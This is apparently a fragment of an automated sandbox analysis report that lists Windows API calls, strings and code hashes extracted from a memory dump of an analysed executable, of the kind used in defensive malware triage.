                                                                                                                                                                                                                                                                                                    • kernel32.dll, xrefs: 00E404A3
                                                                                                                                                                                                                                                                                                    • SleepConditionVariableCS, xrefs: 00E404C4
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: AddressProc$HandleModule__crt_fast_encode_pointer$CountCriticalInitializeSectionSpin___scrt_fastfail__onexit__scrt_initialize_thread_safe_statics_platform_specific
                                                                                                                                                                                                                                                                                                    • String ID: InitializeConditionVariable$SleepConditionVariableCS$WakeAllConditionVariable$api-ms-win-core-synch-l1-2-0.dll$kernel32.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 66158676-1714406822
                                                                                                                                                                                                                                                                                                    • Opcode ID: b80b87823d7166340f38056c47f3f04b635b25f9b54943d424c28353458d5ca7
                                                                                                                                                                                                                                                                                                    • Instruction ID: c6c857a63d2c9ea0ea233f47ef779af26f2df78bc3cd38e83e5c0f6fd753bf2f
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: b80b87823d7166340f38056c47f3f04b635b25f9b54943d424c28353458d5ca7
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1F210E32A45708AFD7206BA5BC45F6A37D4DB45B65F001239FB15F72C0EF749C058951
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CharLowerBuffW.USER32(00000000,00000000,00EBDCD0), ref: 00E94F6C
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E94F80
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E94FDE
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E95039
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E95084
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00E950EC
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E3FD52: _wcslen.LIBCMT ref: 00E3FD5D
                                                                                                                                                                                                                                                                                                    • GetDriveTypeW.KERNEL32(?,00EE7C10,00000061), ref: 00E95188
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$BuffCharDriveLowerType
                                                                                                                                                                                                                                                                                                    • String ID: all$cdrom$fixed$network$ramdisk$removable$unknown
                                                                                                                                                                                                                                                                                                    • API String ID: 2055661098-1000479233
                                                                                                                                                                                                                                                                                                    • Opcode ID: 0882c747847afc546c1b36323d8dc586a35987486833479ee8140891cb07d947
                                                                                                                                                                                                                                                                                                    • Instruction ID: 33a0a3bc0d73853c8c552e0040edf0e15b808e672e0734274df18b0b864aa16c
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 0882c747847afc546c1b36323d8dc586a35987486833479ee8140891cb07d947
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 1FB12472609B029FCB10EF29D890A6FB7E5BF94724F10691DF496A7291DB30DC44CB92
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EABBF8
                                                                                                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EABC10
                                                                                                                                                                                                                                                                                                    • GetSystemDirectoryW.KERNEL32(00000000,00000000), ref: 00EABC34
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EABC60
                                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EABC74
                                                                                                                                                                                                                                                                                                    • GetCurrentDirectoryW.KERNEL32(00000000,00000000), ref: 00EABC96
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EABD92
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E90F4E: GetStdHandle.KERNEL32(000000F6), ref: 00E90F6D
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EABDAB
                                                                                                                                                                                                                                                                                                    • _wcslen.LIBCMT ref: 00EABDC6
                                                                                                                                                                                                                                                                                                    • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,?,?,00000000,?,?,?), ref: 00EABE16
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(00000000), ref: 00EABE67
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00EABE99
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00EABEAA
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00EABEBC
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000), ref: 00EABECE
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(?), ref: 00EABF43
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Handle$Close_wcslen$Directory$CurrentSystem$CreateErrorLastProcess
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 2178637699-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 7f20b0d37d527f3cbcabc44de72cbe9089a0b3b0dc427fa39687d7c9a531fe5c
                                                                                                                                                                                                                                                                                                    • Instruction ID: fa27c5c51629736ad9a449f50d7a061eea50507a4e3e60d7ba57eefabbbda800
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 7f20b0d37d527f3cbcabc44de72cbe9089a0b3b0dc427fa39687d7c9a531fe5c
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: BEF1D1716083009FCB14EF24D891B6ABBE5BF89314F18955DF489AF2A2DB31EC45CB52
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(kernel32.dll,?,00EBDCD0), ref: 00EA4B18
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,GetModuleHandleExW), ref: 00EA4B2A
                                                                                                                                                                                                                                                                                                    • GetModuleFileNameW.KERNEL32(?,?,00000104,?,?,?,00EBDCD0), ref: 00EA4B4F
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000,?,00EBDCD0), ref: 00EA4B9B
                                                                                                                                                                                                                                                                                                    • StringFromGUID2.OLE32(?,?,00000028,?,00EBDCD0), ref: 00EA4C05
                                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(00000009), ref: 00EA4CBF
                                                                                                                                                                                                                                                                                                    • QueryPathOfRegTypeLib.OLEAUT32(?,?,?,?,?), ref: 00EA4D25
                                                                                                                                                                                                                                                                                                    • SysFreeString.OLEAUT32(?), ref: 00EA4D4F
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: FreeString$Library$AddressFileFromLoadModuleNamePathProcQueryType
                                                                                                                                                                                                                                                                                                    • String ID: GetModuleHandleExW$kernel32.dll
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(00EF29C0), ref: 00E63F72
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(00EF29C0), ref: 00E64022
                                                                                                                                                                                                                                                                                                    • GetCursorPos.USER32(?), ref: 00E64066
                                                                                                                                                                                                                                                                                                    • SetForegroundWindow.USER32(00000000), ref: 00E6406F
                                                                                                                                                                                                                                                                                                    • TrackPopupMenuEx.USER32(00EF29C0,00000000,?,00000000,00000000,00000000), ref: 00E64082
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(00000000,00000000,00000000,00000000), ref: 00E6408E
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    • Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Menu$CountItem$CursorForegroundMessagePopupPostTrackWindow
                                                                                                                                                                                                                                                                                                    • String ID: 0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(00000000,?), ref: 00EB7823
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E28577: _wcslen.LIBCMT ref: 00E2858A
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00EB7897
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00EB78B9
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EB78CC
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00EB78ED
                                                                                                                                                                                                                                                                                                    • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00E20000,00000000), ref: 00EB791C
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00EB7935
                                                                                                                                                                                                                                                                                                    • GetDesktopWindow.USER32 ref: 00EB794E
                                                                                                                                                                                                                                                                                                    • GetWindowRect.USER32(00000000), ref: 00EB7955
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00EB796D
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00EB7985
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E22234: GetWindowLongW.USER32(?,000000EB), ref: 00E22242
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_wcslen
                                                                                                                                                                                                                                                                                                    • String ID: 0$tooltips_class32
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E21802: InvalidateRect.USER32(?,00000000,00000001,?,?,?,00E21488,?,00000000,?,?,?,?,00E2145A,00000000,?), ref: 00E21865
                                                                                                                                                                                                                                                                                                    • DestroyWindow.USER32(?), ref: 00E21521
                                                                                                                                                                                                                                                                                                    • KillTimer.USER32(00000000,?,?,?,?,00E2145A,00000000,?), ref: 00E215BB
                                                                                                                                                                                                                                                                                                    • DestroyAcceleratorTable.USER32(00000000), ref: 00E629B4
                                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,00000000,?,?,?,?,00E2145A,00000000,?), ref: 00E629E2
                                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(?,?,?,?,?,?,?,00000000,?,?,?,?,00E2145A,00000000,?), ref: 00E629F9
                                                                                                                                                                                                                                                                                                    • ImageList_Destroy.COMCTL32(00000000,?,?,?,?,?,?,?,?,00000000,?,?,?,?,00E2145A,00000000), ref: 00E62A15
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00E62A27
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Destroy$ImageList_$AcceleratorDeleteInvalidateKillObjectRectTableTimerWindow
                                                                                                                                                                                                                                                                                                    • String ID: <)
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • InternetConnectW.WININET(?,?,?,?,?,?,00000000,00000000), ref: 00E9CEF5
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00E9CF08
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00E9CF1C
                                                                                                                                                                                                                                                                                                    • HttpOpenRequestW.WININET(00000000,00000000,?,00000000,00000000,00000000,?,00000000), ref: 00E9CF35
                                                                                                                                                                                                                                                                                                    • InternetQueryOptionW.WININET(00000000,0000001F,?,?), ref: 00E9CF78
                                                                                                                                                                                                                                                                                                    • InternetSetOptionW.WININET(00000000,0000001F,00000100,00000004), ref: 00E9CF8E
                                                                                                                                                                                                                                                                                                    • HttpSendRequestW.WININET(00000000,00000000,00000000,00000000,00000000), ref: 00E9CF99
                                                                                                                                                                                                                                                                                                    • HttpQueryInfoW.WININET(00000000,00000005,?,?,?), ref: 00E9CFC9
                                                                                                                                                                                                                                                                                                    • GetLastError.KERNEL32(?,00000003,?,?,?,?,?,?), ref: 00E9D021
                                                                                                                                                                                                                                                                                                    • SetEvent.KERNEL32(?,?,00000003,?,?,?,?,?,?), ref: 00E9D035
                                                                                                                                                                                                                                                                                                    • InternetCloseHandle.WININET(00000000), ref: 00E9D040
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Internet$Http$ErrorEventLastOptionQueryRequest$CloseConnectHandleInfoOpenSend
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3800310941-3916222277
                                                                                                                                                                                                                                                                                                    • Opcode ID: f82c87a23d4851b52ee4a5044063e21075e2e1b529e4e2c699b2f4ed38b17d03
                                                                                                                                                                                                                                                                                                    • Instruction ID: 843c285dd86ab35381f8c4ccd8edd9a281fe02b6b632381719c5b3d87a3f91c0
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: f82c87a23d4851b52ee4a5044063e21075e2e1b529e4e2c699b2f4ed38b17d03
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 06518EB1504608BFDB219F61CC88AAB7BFDFF08788F10551AF945A6250E734D949EBA0
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                    • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00EB66D6,?,?), ref: 00EB8FEE
                                                                                                                                                                                                                                                                                                    • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00EB66D6,?,?,00000000,?), ref: 00EB8FFE
                                                                                                                                                                                                                                                                                                    • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00EB66D6,?,?,00000000,?), ref: 00EB9009
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00EB66D6,?,?,00000000,?), ref: 00EB9016
                                                                                                                                                                                                                                                                                                    • GlobalLock.KERNEL32(00000000), ref: 00EB9024
                                                                                                                                                                                                                                                                                                    • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00EB66D6,?,?,00000000,?), ref: 00EB9033
                                                                                                                                                                                                                                                                                                    • GlobalUnlock.KERNEL32(00000000), ref: 00EB903C
                                                                                                                                                                                                                                                                                                    • CloseHandle.KERNEL32(00000000,?,?,?,?,00EB66D6,?,?,00000000,?), ref: 00EB9043
                                                                                                                                                                                                                                                                                                    • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00EB66D6,?,?,00000000,?), ref: 00EB9054
                                                                                                                                                                                                                                                                                                    • OleLoadPicture.OLEAUT32(?,00000000,00000000,00EC0C04,?), ref: 00EB906D
                                                                                                                                                                                                                                                                                                    • GlobalFree.KERNEL32(00000000), ref: 00EB907D
                                                                                                                                                                                                                                                                                                    • GetObjectW.GDI32(00000000,00000018,?), ref: 00EB909D
                                                                                                                                                                                                                                                                                                    • CopyImage.USER32(00000000,00000000,00000000,?,00002000), ref: 00EB90CD
                                                                                                                                                                                                                                                                                                    • DeleteObject.GDI32(00000000), ref: 00EB90F5
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00EB910B
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                                                                                                                                                                                                                                    • String ID:
                                                                                                                                                                                                                                                                                                    • API String ID: 3840717409-0
                                                                                                                                                                                                                                                                                                    • Opcode ID: 87b9b59461ee38ad4b3dbd8654c34dd641f49dd4b0c5aaf2b1d6d8a81046fe8b
                                                                                                                                                                                                                                                                                                    • Instruction ID: cd78a12dcd3adb8a435eee08b89f578700541fe9793d081b5110eaedd1920eab
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 87b9b59461ee38ad4b3dbd8654c34dd641f49dd4b0c5aaf2b1d6d8a81046fe8b
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 8A414975604209BFDB119F6ADC88EABBBB8FF89715F108168F905E7261E7309D05CB20
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2B329: _wcslen.LIBCMT ref: 00E2B333
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: CharUpperBuffW.USER32(?,?,?,?,?,?,?,00EAC10E,?,?), ref: 00EAD415
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD451
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD4C8
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00EAD3F8: _wcslen.LIBCMT ref: 00EAD4FE
                                                                                                                                                                                                                                                                                                    • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 00EAC154
                                                                                                                                                                                                                                                                                                    • RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 00EAC1D2
                                                                                                                                                                                                                                                                                                    • RegDeleteValueW.ADVAPI32(?,?), ref: 00EAC26A
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00EAC2DE
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(?), ref: 00EAC2FC
                                                                                                                                                                                                                                                                                                    • LoadLibraryA.KERNEL32(advapi32.dll), ref: 00EAC352
                                                                                                                                                                                                                                                                                                    • GetProcAddress.KERNEL32(00000000,RegDeleteKeyExW), ref: 00EAC364
                                                                                                                                                                                                                                                                                                    • RegDeleteKeyW.ADVAPI32(?,?), ref: 00EAC382
                                                                                                                                                                                                                                                                                                    • FreeLibrary.KERNEL32(00000000), ref: 00EAC3E3
                                                                                                                                                                                                                                                                                                    • RegCloseKey.ADVAPI32(00000000), ref: 00EAC3F4
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Memory Dump Source
                                                                                                                                                                                                                                                                                                    • Source File: 0000000B.00000002.3150534475.0000000000E21000.00000020.00000001.01000000.00000007.sdmp, Offset: 00E20000, based on PE: true
• Associated: 0000000B.00000002.3150428228.0000000000E20000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EBD000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150832613.0000000000EE3000.00000002.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3150997553.0000000000EED000.00000004.00000001.01000000.00000007.sdmp
• Associated: 0000000B.00000002.3151047613.0000000000EF5000.00000002.00000001.01000000.00000007.sdmp
                                                                                                                                                                                                                                                                                                    Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                    • Snapshot File: hcaresult_11_2_e20000_Procedures.jbxd
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: _wcslen$Close$DeleteLibrary$AddressBuffCharConnectFreeLoadOpenProcRegistryUpperValue
                                                                                                                                                                                                                                                                                                    • String ID: RegDeleteKeyExW$advapi32.dll
                                                                                                                                                                                                                                                                                                    • API String ID: 146587525-4033151799
                                                                                                                                                                                                                                                                                                    • Opcode ID: 174ec3177ce6f8c45c5f8bb921d1e30a8f9faa6a4213ece30182efa892dc3205
                                                                                                                                                                                                                                                                                                    • Instruction ID: bf65cfba1f70c88567b6d957975b8a7c562f4b22a30c4c19f168abe952813450
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: 174ec3177ce6f8c45c5f8bb921d1e30a8f9faa6a4213ece30182efa892dc3205
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: 57C16C35208201AFD714DF14C895F6ABBE1BF89308F24959CE456AF2A2CB71FC46CB91
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00EBA990
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000011), ref: 00EBA9A7
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(00000004), ref: 00EBA9B3
                                                                                                                                                                                                                                                                                                    • GetSystemMetrics.USER32(0000000F), ref: 00EBA9C9
                                                                                                                                                                                                                                                                                                    • MoveWindow.USER32(00000003,?,?,00000001,?,00000000,?,00000000,?,00000000), ref: 00EBAC15
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000003,00000142,00000000,0000FFFF), ref: 00EBAC33
                                                                                                                                                                                                                                                                                                    • SendMessageW.USER32(00000003,00000469,?,00000000), ref: 00EBAC54
                                                                                                                                                                                                                                                                                                    • ShowWindow.USER32(00000003,00000000), ref: 00EBAC73
                                                                                                                                                                                                                                                                                                    • InvalidateRect.USER32(?,00000000,00000001), ref: 00EBAC95
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000005,?), ref: 00EBACBB
                                                                                                                                                                                                                                                                                                    Strings
                                                                                                                                                                                                                                                                                                    Similarity
                                                                                                                                                                                                                                                                                                    • API ID: MetricsSystem$Window$MessageSend$InvalidateLongMoveProcRectShow
                                                                                                                                                                                                                                                                                                    • String ID: @$(
                                                                                                                                                                                                                                                                                                    • API String ID: 3962739598-2721164788
                                                                                                                                                                                                                                                                                                    • Opcode ID: da8636e8d13aaaa1d73a55a1ca926608e0f5adbd469c8b3eebe6a1fd354ce8cc
                                                                                                                                                                                                                                                                                                    • Instruction ID: 3bea88920137553d86df5525a98dc937835671d2880f6ae57859857b06eccbb2
                                                                                                                                                                                                                                                                                                    • Opcode Fuzzy Hash: da8636e8d13aaaa1d73a55a1ca926608e0f5adbd469c8b3eebe6a1fd354ce8cc
                                                                                                                                                                                                                                                                                                    • Instruction Fuzzy Hash: DDB17631600219EFCF14CF69C9847FE7BF2BF84704F189069ED48AA295D770A984CBA1
                                                                                                                                                                                                                                                                                                    APIs
                                                                                                                                                                                                                                                                                                      • Part of subcall function 00E2249F: GetWindowLongW.USER32(00000000,000000EB), ref: 00E224B0
                                                                                                                                                                                                                                                                                                    • PostMessageW.USER32(?,00000111,00000000,00000000), ref: 00EB97B6
                                                                                                                                                                                                                                                                                                    • GetFocus.USER32 ref: 00EB97C6
                                                                                                                                                                                                                                                                                                    • GetDlgCtrlID.USER32(00000000), ref: 00EB97D1
                                                                                                                                                                                                                                                                                                    • DefDlgProcW.USER32(?,00000111,?,?,00000000,?,?,?,?), ref: 00EB9879
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,00000000,00000000,?), ref: 00EB992B
                                                                                                                                                                                                                                                                                                    • GetMenuItemCount.USER32(?), ref: 00EB9948
                                                                                                                                                                                                                                                                                                    • GetMenuItemID.USER32(?,00000000), ref: 00EB9958
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,-00000001,00000001,?), ref: 00EB998A
                                                                                                                                                                                                                                                                                                    • GetMenuItemInfoW.USER32(?,?,00000001,?), ref: 00EB99CC
